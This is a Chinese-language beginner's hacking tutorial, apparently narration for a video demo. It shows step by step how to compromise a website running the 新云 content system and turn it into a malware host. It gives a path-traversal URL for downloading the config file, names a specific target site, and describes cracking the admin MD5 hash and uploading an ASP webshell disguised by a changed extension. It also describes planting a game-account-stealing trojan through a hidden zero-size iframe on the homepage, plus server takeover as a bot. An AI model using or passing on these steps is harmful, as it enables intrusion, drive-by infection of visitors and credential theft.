大家好，我的网名是：毒血
  今天给大家演示一下如何利用漏洞获得网站webshell，然后挂马的过程。
是个比较完整的过程，这个比较适合新手学习。

过程：
1、了解网站系统的漏洞。
   这里以《新云网站系统》为例。新云曾经出了个可以直接下载CONN.ASP获得数据库信息的漏洞
输入 http://你的域名/flash/downfile.asp?url=uploadfile/../../conn.asp就可以直接下载文件。
这个网站http://www.chaogeng.uicp.cn/就这个漏洞，我们把conn.asp下载下来。

2、获得后台密码
   从conn.asp文件读取数据库的位置后，然后将其下载下来。如不能直接下，就用讯雷。
打开admin这个表，把密文复制下来，然后用在线MD5破解出来。
刚才是因为我下过了的，所以出现那样的情况。
3、获得webshell
   用刚才得到的管理员账户登陆后台，把asp木马上传上去，注意先要把木马改下后缀名，这样才
能传上去，然后再备份数据库，还原成asp格式的。OK后，直接访问我们的木马地址。现在我们可以对
网站可以随意控制和操作了。

4、配置要挂的木马
   我们以问道的 木马为例。生成服务端后上传到网站上。

5、配制网马
   打开网马生成器，填如刚才生成的木马的地址，生产木马网页。然后上传到网站。

6、挂马
   挂马比较简单了，编辑网站首页，然后插入<iframe src=“网页木马地址” width=0 height=0></iframe> 。这样就完成了。别人打开这个网站的首页的时候就中马了。

   当然，还可以利用webshell 可以提权获得服务器的权限，就获得肉机了.
   谢谢大家观看，动画到此结束。